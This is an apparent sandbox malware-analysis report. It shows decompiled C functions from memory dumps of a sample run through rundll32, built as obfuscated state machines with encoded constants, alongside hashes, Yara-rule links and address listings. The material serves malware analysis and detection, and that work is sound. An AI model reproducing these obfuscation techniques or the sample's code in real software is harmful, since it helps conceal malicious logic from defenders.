                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Iconic
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 110040809-0
                                                                                                                      • Opcode ID: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                      • Instruction ID: 838b9ee9edc54b62b4d2e1430c30368496747ad900502173d0e488298d75c8b4
                                                                                                                      • Opcode Fuzzy Hash: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                      • Instruction Fuzzy Hash: D6C012B0504208EB8704CB94D940C1977A8E74D30470002CCF80C83300D531AD008655
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002BCA43 Relevance: 1.5, Strings: 1, Instructions: 248COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E002BCA43(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				void* _t229;
				void* _t247;
				void* _t251;
				void* _t257;
				void* _t260;
				void* _t261;
				void* _t263;
				intOrPtr _t288;
				signed int _t289;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				void* _t294;
				void* _t295;

				_push(_a16);
				_t287 = _a12;
				_t261 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002BCF25(_t229);
				_v64 = 0x836860;
				_t288 = 0;
				_v60 = 0x763ad4;
				_t295 = _t294 + 0x18;
				_v56 = 0;
				_v132 = 0xf23cd2;
				_t263 = 0x1cd9a3d;
				_v132 = _v132 + 0xffff66b2;
				_v132 = _v132 + 0xffff69fc;
				_v132 = _v132 << 8;
				_v132 = _v132 ^ 0xf1039f05;
				_v140 = 0x375552;
				_v140 = _v140 << 6;
				_v140 = _v140 ^ 0xd2a5ef1f;
				_v140 = _v140 >> 0xb;
				_v140 = _v140 ^ 0x00122384;
				_v108 = 0x5e168a;
				_v108 = _v108 >> 0x10;
				_v108 = _v108 + 0xda32;
				_v108 = _v108 ^ 0x00005a0c;
				_v116 = 0x4fe29d;
				_v116 = _v116 >> 0x10;
				_v116 = _v116 << 4;
				_v116 = _v116 ^ 0x0003d351;
				_v88 = 0xa9a316;
				_v88 = _v88 + 0xe91b;
				_v88 = _v88 ^ 0x00a1e0df;
				_v136 = 0x77a290;
				_v136 = _v136 << 0xc;
				_t289 = 0x74;
				_v136 = _v136 / _t289;
				_v136 = _v136 + 0xffff257b;
				_v136 = _v136 ^ 0x01061e79;
				_v152 = 0x936910;
				_v152 = _v152 * 0x7a;
				_v152 = _v152 >> 3;
				_v152 = _v152 + 0xffff8db3;
				_v152 = _v152 ^ 0x08cdb86a;
				_v128 = 0x509c4c;
				_v128 = _v128 + 0x81f1;
				_v128 = _v128 + 0x9dbc;
				_v128 = _v128 >> 5;
				_v128 = _v128 ^ 0x00071675;
				_v148 = 0xcab80c;
				_v148 = _v148 >> 0xd;
				_v148 = _v148 | 0x660debd0;
				_v148 = _v148 + 0xf630;
				_v148 = _v148 ^ 0x660fbc32;
				_v104 = 0xc88284;
				_v104 = _v104 ^ 0xe0b202bb;
				_v104 = _v104 * 0x70;
				_v104 = _v104 ^ 0x35911582;
				_v84 = 0x688efd;
				_v84 = _v84 ^ 0xa5781683;
				_v84 = _v84 ^ 0xa515c2ff;
				_v156 = 0x3b8040;
				_v156 = _v156 | 0xffdbffba;
				_v156 = _v156 ^ 0xfff6b3f0;
				_v72 = 0x8d74e9;
				_v72 = _v72 >> 8;
				_v72 = _v72 ^ 0x0004dfda;
				_v160 = 0xbd1b1c;
				_v160 = _v160 << 0xc;
				_v160 = _v160 | 0x33bb8ca8;
				_v160 = _v160 ^ 0xcf7854ed;
				_v160 = _v160 ^ 0x3ccd45a9;
				_v120 = 0x48e6fb;
				_v120 = _v120 | 0xe61fffb2;
				_v120 = _v120 ^ 0xe6598779;
				_v68 = 0x77306;
				_v68 = _v68 >> 6;
				_v68 = _v68 ^ 0x0008dc17;
				_v112 = 0x774006;
				_v112 = _v112 << 0xd;
				_v112 = _v112 + 0xffffb426;
				_v112 = _v112 ^ 0xe80ab914;
				_v144 = 0x2b5eea;
				_t290 = 0x79;
				_v144 = _v144 * 0x59;
				_v144 = _v144 + 0xffffa818;
				_v144 = _v144 ^ 0xb076c16e;
				_v144 = _v144 ^ 0xbf611da3;
				_v96 = 0xa17410;
				_v96 = _v96 | 0x939b80d1;
				_v96 = _v96 / _t290;
				_v96 = _v96 ^ 0x01375591;
				_v80 = 0xb3b8;
				_t291 = 0x5c;
				_v80 = _v80 / _t291;
				_v80 = _v80 ^ 0x0003830b;
				_v76 = 0xc52b4a;
				_v76 = _v76 >> 0xe;
				_v76 = _v76 ^ 0x00071242;
				_v92 = 0xc8fd49;
				_t292 = 0x54;
				_v92 = _v92 / _t292;
				_v92 = _v92 ^ 0x044db90d;
				_v92 = _v92 ^ 0x044d9acc;
				_v100 = 0x5afe59;
				_v100 = _v100 ^ 0x0de7f0e8;
				_v100 = _v100 | 0x5cb6a54b;
				_v100 = _v100 ^ 0x5db2bb74;
				_v124 = 0xa19aac;
				_v124 = _v124 + 0xffff97b1;
				_v124 = _v124 * 0x3e;
				_v124 = _v124 >> 0xe;
				_v124 = _v124 ^ 0x000bad60;
				while(_t263 != 0xd5ede2) {
					if(_t263 == 0x1cd9a3d) {
						_t263 = 0xd5ede2;
						continue;
					} else {
						if(_t263 == 0x72d0ec7) {
							_t247 = E002BB09F(_v148, _v104,  &_v52, _v84, _t287 + 8, _v156);
							_t295 = _t295 + 0x10;
							__eflags = _t247;
							if(__eflags != 0) {
								_t263 = 0x78e1ae6;
								continue;
							}
						} else {
							if(_t263 == 0x78e1ae6) {
								_t251 = E002BB09F(_v72, _v160,  &_v52, _v120, _t287 + 0xc, _v68);
								_t295 = _t295 + 0x10;
								__eflags = _t251;
								if(__eflags != 0) {
									_t263 = 0xabcd4f8;
									continue;
								}
							} else {
								if(_t263 == 0x7ae58b3) {
									__eflags = E002CB9B1(_v76, _v92, __eflags, _t287 + 0x2c, _v100,  &_v52, _v124);
									_t288 =  !=  ? 1 : _t288;
								} else {
									if(_t263 == 0xabcd4f8) {
										_t257 = E002BB09F(_v112, _v144,  &_v52, _v96, _t287 + 0x40, _v80);
										_t295 = _t295 + 0x10;
										__eflags = _t257;
										if(__eflags != 0) {
											_t263 = 0x7ae58b3;
											continue;
										}
									} else {
										if(_t263 != 0xc0b979a) {
											L18:
											__eflags = _t263 - 0x38140c5;
											if(__eflags != 0) {
												continue;
											} else {
											}
										} else {
											_t260 = E002BB09F(_v88, _v136,  &_v52, _v152, _t287 + 0x38, _v128);
											_t295 = _t295 + 0x10;
											if(_t260 != 0) {
												_t263 = 0x72d0ec7;
												continue;
											}
										}
									}
								}
							}
						}
					}
					return _t288;
				}
				E002C64C5(_v132, _v140, _v108, _v116, _t261,  &_v52);
				_t295 = _t295 + 0x10;
				_t263 = 0xc0b979a;
				goto L18;
			}













































                                                                                                                      0x002bca4d
                                                                                                                      0x002bca54
                                                                                                                      0x002bca5b
                                                                                                                      0x002bca5d
                                                                                                                      0x002bca5e
                                                                                                                      0x002bca65
                                                                                                                      0x002bca6c
                                                                                                                      0x002bca6d
                                                                                                                      0x002bca6e
                                                                                                                      0x002bca73
                                                                                                                      0x002bca7e
                                                                                                                      0x002bca80
                                                                                                                      0x002bca8b
                                                                                                                      0x002bca8e
                                                                                                                      0x002bca94
                                                                                                                      0x002bca9c
                                                                                                                      0x002bcaa1
                                                                                                                      0x002bcaa9
                                                                                                                      0x002bcab1
                                                                                                                      0x002bcab6
                                                                                                                      0x002bcabe
                                                                                                                      0x002bcac6
                                                                                                                      0x002bcacb
                                                                                                                      0x002bcad3
                                                                                                                      0x002bcad8
                                                                                                                      0x002bcae0
                                                                                                                      0x002bcae8
                                                                                                                      0x002bcaed
                                                                                                                      0x002bcaf5
                                                                                                                      0x002bcafd
                                                                                                                      0x002bcb05
                                                                                                                      0x002bcb0a
                                                                                                                      0x002bcb0f
                                                                                                                      0x002bcb17
                                                                                                                      0x002bcb1f
                                                                                                                      0x002bcb27
                                                                                                                      0x002bcb2f
                                                                                                                      0x002bcb37
                                                                                                                      0x002bcb42
                                                                                                                      0x002bcb45
                                                                                                                      0x002bcb49
                                                                                                                      0x002bcb51
                                                                                                                      0x002bcb59
                                                                                                                      0x002bcb66
                                                                                                                      0x002bcb6a
                                                                                                                      0x002bcb6f
                                                                                                                      0x002bcb77
                                                                                                                      0x002bcb7f
                                                                                                                      0x002bcb87
                                                                                                                      0x002bcb8f
                                                                                                                      0x002bcb97
                                                                                                                      0x002bcb9c
                                                                                                                      0x002bcba4
                                                                                                                      0x002bcbac
                                                                                                                      0x002bcbb1
                                                                                                                      0x002bcbb9
                                                                                                                      0x002bcbc1
                                                                                                                      0x002bcbc9
                                                                                                                      0x002bcbd1
                                                                                                                      0x002bcbde
                                                                                                                      0x002bcbe2
                                                                                                                      0x002bcbea
                                                                                                                      0x002bcbf2
                                                                                                                      0x002bcbfa
                                                                                                                      0x002bcc02
                                                                                                                      0x002bcc0a
                                                                                                                      0x002bcc12
                                                                                                                      0x002bcc1a
                                                                                                                      0x002bcc22
                                                                                                                      0x002bcc27
                                                                                                                      0x002bcc2f
                                                                                                                      0x002bcc37
                                                                                                                      0x002bcc3e
                                                                                                                      0x002bcc46
                                                                                                                      0x002bcc4e
                                                                                                                      0x002bcc56
                                                                                                                      0x002bcc5e
                                                                                                                      0x002bcc66
                                                                                                                      0x002bcc6e
                                                                                                                      0x002bcc76
                                                                                                                      0x002bcc7b
                                                                                                                      0x002bcc83
                                                                                                                      0x002bcc8b
                                                                                                                      0x002bcc90
                                                                                                                      0x002bcc98
                                                                                                                      0x002bcca0
                                                                                                                      0x002bccaf
                                                                                                                      0x002bccb2
                                                                                                                      0x002bccb6
                                                                                                                      0x002bccbe
                                                                                                                      0x002bccc6
                                                                                                                      0x002bccce
                                                                                                                      0x002bccd6
                                                                                                                      0x002bcce6
                                                                                                                      0x002bccea
                                                                                                                      0x002bccf2
                                                                                                                      0x002bccfe
                                                                                                                      0x002bcd03
                                                                                                                      0x002bcd09
                                                                                                                      0x002bcd11
                                                                                                                      0x002bcd19
                                                                                                                      0x002bcd1e
                                                                                                                      0x002bcd26
                                                                                                                      0x002bcd32
                                                                                                                      0x002bcd3a
                                                                                                                      0x002bcd3e
                                                                                                                      0x002bcd46
                                                                                                                      0x002bcd4e
                                                                                                                      0x002bcd56
                                                                                                                      0x002bcd5e
                                                                                                                      0x002bcd66
                                                                                                                      0x002bcd6e
                                                                                                                      0x002bcd76
                                                                                                                      0x002bcd83
                                                                                                                      0x002bcd87
                                                                                                                      0x002bcd8c
                                                                                                                      0x002bcd94
                                                                                                                      0x002bcda2
                                                                                                                      0x002bceb1
                                                                                                                      0x00000000
                                                                                                                      0x002bcda8
                                                                                                                      0x002bcdae
                                                                                                                      0x002bce9b
                                                                                                                      0x002bcea0
                                                                                                                      0x002bcea3
                                                                                                                      0x002bcea5
                                                                                                                      0x002bcea7
                                                                                                                      0x00000000
                                                                                                                      0x002bcea7
                                                                                                                      0x002bcdb4
                                                                                                                      0x002bcdba
                                                                                                                      0x002bce65
                                                                                                                      0x002bce6a
                                                                                                                      0x002bce6d
                                                                                                                      0x002bce6f
                                                                                                                      0x002bce75
                                                                                                                      0x00000000
                                                                                                                      0x002bce75
                                                                                                                      0x002bcdc0
                                                                                                                      0x002bcdc6
                                                                                                                      0x002bcf13
                                                                                                                      0x002bcf15
                                                                                                                      0x002bcdcc
                                                                                                                      0x002bcdd2
                                                                                                                      0x002bce2f
                                                                                                                      0x002bce34
                                                                                                                      0x002bce37
                                                                                                                      0x002bce39
                                                                                                                      0x002bce3f
                                                                                                                      0x00000000
                                                                                                                      0x002bce3f
                                                                                                                      0x002bcdd4
                                                                                                                      0x002bcdda
                                                                                                                      0x002bcede
                                                                                                                      0x002bcede
                                                                                                                      0x002bcee4
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002bceea
                                                                                                                      0x002bcde0
                                                                                                                      0x002bcdfc
                                                                                                                      0x002bce01
                                                                                                                      0x002bce06
                                                                                                                      0x002bce0c
                                                                                                                      0x00000000
                                                                                                                      0x002bce0c
                                                                                                                      0x002bce06
                                                                                                                      0x002bcdda
                                                                                                                      0x002bcdd2
                                                                                                                      0x002bcdc6
                                                                                                                      0x002bcdba
                                                                                                                      0x002bcdae
                                                                                                                      0x002bcf24
                                                                                                                      0x002bcf24
                                                                                                                      0x002bced1
                                                                                                                      0x002bced6
                                                                                                                      0x002bced9
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RU7
                                                                                                                      • API String ID: 0-4010291154
                                                                                                                      • Opcode ID: 7af6df2ff8a9b6f82361f13cbade41a7c387482da999aa364547f9e347cbb905
                                                                                                                      • Instruction ID: ccb1d4b0293022b1e9b12bd7bd60a56f98951aa42aef75dd9f3e2bec6e693aad
                                                                                                                      • Opcode Fuzzy Hash: 7af6df2ff8a9b6f82361f13cbade41a7c387482da999aa364547f9e347cbb905
                                                                                                                      • Instruction Fuzzy Hash: E0C130711183869FD768CE61C88996BFBE5FBC4388F108A1DF69682260D3B5C959CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002C64F1 Relevance: 1.4, Strings: 1, Instructions: 152COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E002C64F1(intOrPtr* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t137;
				void* _t150;
				intOrPtr _t151;
				void* _t157;
				intOrPtr* _t172;
				intOrPtr _t173;
				signed int _t174;
				signed int _t175;
				signed int _t176;
				signed int* _t179;

				_t155 = _a4;
				_push(_a8);
				_t172 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002BCF25(_t137);
				_v48 = 0x93d665;
				_t179 =  &(( &_v100)[4]);
				_t173 = 0;
				_v44 = 0;
				_t157 = 0x9466795;
				_v40 = 0;
				_v92 = 0xc35ba1;
				_v92 = _v92 + 0xcdf2;
				_t174 = 0x24;
				_v92 = _v92 / _t174;
				_v92 = _v92 ^ 0x5a7ecd09;
				_v92 = _v92 ^ 0x5a7bbfe7;
				_v56 = 0x6ac612;
				_v56 = _v56 ^ 0x41bcc0f7;
				_v56 = _v56 + 0xffffadf0;
				_v56 = _v56 ^ 0x41d5b4d5;
				_v100 = 0xa175c9;
				_v100 = _v100 | 0xb7da1d5b;
				_v100 = _v100 ^ 0x832b9b3a;
				_v100 = _v100 ^ 0xfbd8173c;
				_v100 = _v100 ^ 0xcf0e566f;
				_v68 = 0xb337e;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 + 0xffffb10e;
				_v68 = _v68 ^ 0xfff97d65;
				_v72 = 0x51a563;
				_v72 = _v72 | 0x5dd657cd;
				_v72 = _v72 >> 0xb;
				_v72 = _v72 ^ 0x0003baa1;
				_v76 = 0xe50ce8;
				_t175 = 0x4f;
				_v76 = _v76 / _t175;
				_v76 = _v76 | 0x5f70b90d;
				_v76 = _v76 ^ 0x5f701ab2;
				_v80 = 0xbdb868;
				_v80 = _v80 * 0x3f;
				_v80 = _v80 + 0x8645;
				_v80 = _v80 | 0x0d4f9aa3;
				_v80 = _v80 ^ 0x2ff450e8;
				_v52 = 0x17e057;
				_v52 = _v52 >> 0xc;
				_v52 = _v52 ^ 0x00020d27;
				_v60 = 0xa13b54;
				_v60 = _v60 * 0x33;
				_v60 = _v60 ^ 0x49292d47;
				_v60 = _v60 ^ 0x693c6a3c;
				_v84 = 0xcd99b1;
				_v84 = _v84 + 0x2d8d;
				_v84 = _v84 << 7;
				_v84 = _v84 + 0xffff7b1e;
				_v84 = _v84 ^ 0x66e29e95;
				_v88 = 0xe50b02;
				_v88 = _v88 ^ 0x6ddcea1b;
				_v88 = _v88 >> 0x10;
				_v88 = _v88 * 0x49;
				_v88 = _v88 ^ 0x001db712;
				_v64 = 0xb5c75b;
				_v64 = _v64 * 0x46;
				_t176 = 0x77;
				_v64 = _v64 / _t176;
				_v64 = _v64 ^ 0x006c56aa;
				_v96 = 0xaabe6e;
				_v96 = _v96 << 5;
				_v96 = _v96 + 0xffff8361;
				_v96 = _v96 << 3;
				_v96 = _v96 ^ 0xaab2b903;
				do {
					while(_t157 != 0x179a40a) {
						if(_t157 == 0x8ebb7f5) {
							_t151 =  *0x2d5c9c; // 0x0
							E002CD6C0(_v80, _v52, _v60, _t157, _v84, _v88,  &_v36, _t157, _v64, _v92, _v96,  *_t155,  *((intOrPtr*)(_t155 + 4)),  *((intOrPtr*)(_t151 + 8)));
							_t173 =  ==  ? 1 : _t173;
						} else {
							if(_t157 != 0x9466795) {
								goto L8;
							} else {
								_t157 = 0x179a40a;
								continue;
							}
						}
						L11:
						return _t173;
					}
					_push( *_t172);
					_t150 = E002C1831(_v68, _v72,  &_v36, _v76, _t157,  *((intOrPtr*)(_t172 + 4)));
					_t179 =  &(_t179[6]);
					if(_t150 == 0) {
						_t157 = 0x49089dc;
						goto L8;
					} else {
						_t157 = 0x8ebb7f5;
						continue;
					}
					goto L11;
					L8:
				} while (_t157 != 0x49089dc);
				goto L11;
			}






























                                                                                                                      0x002c64f5
                                                                                                                      0x002c64fc
                                                                                                                      0x002c6500
                                                                                                                      0x002c6502
                                                                                                                      0x002c6503
                                                                                                                      0x002c6504
                                                                                                                      0x002c6505
                                                                                                                      0x002c650a
                                                                                                                      0x002c6512
                                                                                                                      0x002c6515
                                                                                                                      0x002c6519
                                                                                                                      0x002c651d
                                                                                                                      0x002c6522
                                                                                                                      0x002c6526
                                                                                                                      0x002c652e
                                                                                                                      0x002c653c
                                                                                                                      0x002c6541
                                                                                                                      0x002c6547
                                                                                                                      0x002c654f
                                                                                                                      0x002c6557
                                                                                                                      0x002c655f
                                                                                                                      0x002c6567
                                                                                                                      0x002c656f
                                                                                                                      0x002c6577
                                                                                                                      0x002c657f
                                                                                                                      0x002c6587
                                                                                                                      0x002c658f
                                                                                                                      0x002c6597
                                                                                                                      0x002c659f
                                                                                                                      0x002c65a7
                                                                                                                      0x002c65ac
                                                                                                                      0x002c65b4
                                                                                                                      0x002c65bc
                                                                                                                      0x002c65c4
                                                                                                                      0x002c65cc
                                                                                                                      0x002c65d1
                                                                                                                      0x002c65d9
                                                                                                                      0x002c65e5
                                                                                                                      0x002c65e8
                                                                                                                      0x002c65ec
                                                                                                                      0x002c65f4
                                                                                                                      0x002c65fc
                                                                                                                      0x002c6609
                                                                                                                      0x002c660d
                                                                                                                      0x002c6615
                                                                                                                      0x002c661d
                                                                                                                      0x002c6625
                                                                                                                      0x002c662d
                                                                                                                      0x002c6632
                                                                                                                      0x002c663a
                                                                                                                      0x002c6647
                                                                                                                      0x002c664b
                                                                                                                      0x002c6653
                                                                                                                      0x002c665b
                                                                                                                      0x002c6663
                                                                                                                      0x002c666b
                                                                                                                      0x002c6670
                                                                                                                      0x002c6678
                                                                                                                      0x002c6680
                                                                                                                      0x002c6688
                                                                                                                      0x002c6690
                                                                                                                      0x002c669a
                                                                                                                      0x002c669e
                                                                                                                      0x002c66a6
                                                                                                                      0x002c66b3
                                                                                                                      0x002c66bf
                                                                                                                      0x002c66c7
                                                                                                                      0x002c66cb
                                                                                                                      0x002c66d3
                                                                                                                      0x002c66db
                                                                                                                      0x002c66e0
                                                                                                                      0x002c66e8
                                                                                                                      0x002c66ed
                                                                                                                      0x002c66f5
                                                                                                                      0x002c66f5
                                                                                                                      0x002c66ff
                                                                                                                      0x002c674a
                                                                                                                      0x002c677e
                                                                                                                      0x002c678f
                                                                                                                      0x002c6701
                                                                                                                      0x002c6707
                                                                                                                      0x00000000
                                                                                                                      0x002c6709
                                                                                                                      0x002c6709
                                                                                                                      0x00000000
                                                                                                                      0x002c6709
                                                                                                                      0x002c6707
                                                                                                                      0x002c6793
                                                                                                                      0x002c679b
                                                                                                                      0x002c679b
                                                                                                                      0x002c670d
                                                                                                                      0x002c6728
                                                                                                                      0x002c672d
                                                                                                                      0x002c6732
                                                                                                                      0x002c673b
                                                                                                                      0x00000000
                                                                                                                      0x002c6734
                                                                                                                      0x002c6734
                                                                                                                      0x00000000
                                                                                                                      0x002c6734
                                                                                                                      0x00000000
                                                                                                                      0x002c6740
                                                                                                                      0x002c6740
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: <j<i
                                                                                                                      • API String ID: 0-2573498096
                                                                                                                      • Opcode ID: 882f4ae8aac2b9a38184b985ab5bfe03c1583939dc597bfd4144be89654b652d
                                                                                                                      • Instruction ID: 1bfd5abff4d7e7f7571d2b9f8112eb742bf95de726954604300566881a67d245
                                                                                                                      • Opcode Fuzzy Hash: 882f4ae8aac2b9a38184b985ab5bfe03c1583939dc597bfd4144be89654b652d
                                                                                                                      • Instruction Fuzzy Hash: 8B6120B14093419FC754CF25C98A91BFBE6FBC4B58F409A1EF58696220D3B18A49CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002C4B56 Relevance: 1.4, Strings: 1, Instructions: 131COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E002C4B56() {
				char _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _t95;
				signed int _t101;
				signed int _t103;
				void* _t104;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				void* _t126;
				signed int _t127;
				signed int* _t128;

				_t128 =  &_v564;
				_v556 = 0x172e57;
				_v556 = _v556 ^ 0x73ef0dea;
				_t104 = 0x4d22871;
				_v556 = _v556 << 5;
				_v556 = _v556 ^ 0x7f0420db;
				_v564 = 0x28c43f;
				_t122 = 0x37;
				_v564 = _v564 / _t122;
				_v564 = _v564 ^ 0x0004b302;
				_t126 = 0;
				_v540 = 0xa3dd1;
				_v540 = _v540 >> 7;
				_v540 = _v540 ^ 0x000ead4a;
				_v548 = 0xb6c83;
				_v548 = _v548 >> 2;
				_v548 = _v548 ^ 0x000dd0d2;
				_v544 = 0xa789eb;
				_t123 = 0x5a;
				_v544 = _v544 / _t123;
				_v544 = _v544 ^ 0x000aafac;
				_v532 = 0x6a9d21;
				_t124 = 0x13;
				_t125 = _v564;
				_v532 = _v532 / _t124;
				_v532 = _v532 ^ 0x0003d3c1;
				_v528 = 0x3996e5;
				_v528 = _v528 >> 4;
				_v528 = _v528 ^ 0x0009e8d5;
				_t103 = _v564;
				_t127 = _v564;
				_v536 = 0xc5251e;
				_v536 = _v536 ^ 0x87fb489f;
				_v536 = _v536 ^ 0x87377a50;
				_v560 = 0x43b612;
				_v560 = _v560 >> 0xe;
				_v560 = _v560 ^ 0x7320a641;
				_v560 = _v560 ^ 0xd4a0e575;
				_v560 = _v560 ^ 0xa78970ff;
				_v552 = 0x3a31ae;
				_v552 = _v552 ^ 0x0baee347;
				_v552 = _v552 ^ 0x0b916be4;
				do {
					while(_t104 != 0x42ef3b0) {
						if(_t104 == 0x4d22871) {
							_t104 = 0xc70fe83;
							continue;
						} else {
							if(_t104 == 0x81a395a) {
								_v564 = 0x2f01d9;
								_v564 = _v564 + 0xd8f0;
								_v564 = _v564 ^ 0x2a08da2b;
								__eflags = _t103 - _v564;
								_t126 =  ==  ? 1 : _t126;
							} else {
								if(_t104 == 0x918a316) {
									_t103 = E002B7677(_t127, _v536, _v560, _v552);
									_t104 = 0x81a395a;
									continue;
								} else {
									if(_t104 == 0xc70fe83) {
										_t101 = E002BC706();
										_t125 = _t101;
										__eflags = _t101;
										if(__eflags != 0) {
											_t104 = 0x42ef3b0;
											continue;
										}
									} else {
										if(_t104 != 0xea0747d) {
											goto L15;
										} else {
											_t127 = E002C4FA8(_v544,  &_v524, _v532, _v528);
											_t104 = 0x918a316;
											continue;
										}
									}
								}
							}
						}
						L18:
						return _t126;
					}
					_t95 = E002D1993(_v564, _v540, __eflags,  &_v524, _t104, _v548, _t125);
					_t128 =  &(_t128[4]);
					__eflags = _t95;
					if(__eflags == 0) {
						_t104 = 0xffaf3fd;
						goto L15;
					} else {
						_t104 = 0xea0747d;
						continue;
					}
					goto L18;
					L15:
					__eflags = _t104 - 0xffaf3fd;
				} while (__eflags != 0);
				goto L18;
			}
























                                                                                                                      0x002c4b56
                                                                                                                      0x002c4b5c
                                                                                                                      0x002c4b66
                                                                                                                      0x002c4b6e
                                                                                                                      0x002c4b73
                                                                                                                      0x002c4b78
                                                                                                                      0x002c4b80
                                                                                                                      0x002c4b90
                                                                                                                      0x002c4b95
                                                                                                                      0x002c4b9b
                                                                                                                      0x002c4ba3
                                                                                                                      0x002c4ba5
                                                                                                                      0x002c4bad
                                                                                                                      0x002c4bb2
                                                                                                                      0x002c4bba
                                                                                                                      0x002c4bc2
                                                                                                                      0x002c4bc7
                                                                                                                      0x002c4bcf
                                                                                                                      0x002c4bdb
                                                                                                                      0x002c4be0
                                                                                                                      0x002c4be6
                                                                                                                      0x002c4bee
                                                                                                                      0x002c4bfa
                                                                                                                      0x002c4bfd
                                                                                                                      0x002c4c01
                                                                                                                      0x002c4c05
                                                                                                                      0x002c4c0d
                                                                                                                      0x002c4c15
                                                                                                                      0x002c4c1a
                                                                                                                      0x002c4c22
                                                                                                                      0x002c4c26
                                                                                                                      0x002c4c2a
                                                                                                                      0x002c4c32
                                                                                                                      0x002c4c3a
                                                                                                                      0x002c4c42
                                                                                                                      0x002c4c4a
                                                                                                                      0x002c4c4f
                                                                                                                      0x002c4c57
                                                                                                                      0x002c4c5f
                                                                                                                      0x002c4c67
                                                                                                                      0x002c4c6f
                                                                                                                      0x002c4c77
                                                                                                                      0x002c4c7f
                                                                                                                      0x002c4c7f
                                                                                                                      0x002c4c91
                                                                                                                      0x002c4d1a
                                                                                                                      0x00000000
                                                                                                                      0x002c4c97
                                                                                                                      0x002c4c9d
                                                                                                                      0x002c4d60
                                                                                                                      0x002c4d6a
                                                                                                                      0x002c4d73
                                                                                                                      0x002c4d7f
                                                                                                                      0x002c4d81
                                                                                                                      0x002c4ca3
                                                                                                                      0x002c4ca9
                                                                                                                      0x002c4d0e
                                                                                                                      0x002c4d10
                                                                                                                      0x00000000
                                                                                                                      0x002c4cab
                                                                                                                      0x002c4cb1
                                                                                                                      0x002c4ce3
                                                                                                                      0x002c4ce8
                                                                                                                      0x002c4cea
                                                                                                                      0x002c4cec
                                                                                                                      0x002c4cf2
                                                                                                                      0x00000000
                                                                                                                      0x002c4cf2
                                                                                                                      0x002c4cb3
                                                                                                                      0x002c4cb9
                                                                                                                      0x00000000
                                                                                                                      0x002c4cbf
                                                                                                                      0x002c4cd6
                                                                                                                      0x002c4cd8
                                                                                                                      0x00000000
                                                                                                                      0x002c4cd8
                                                                                                                      0x002c4cb9
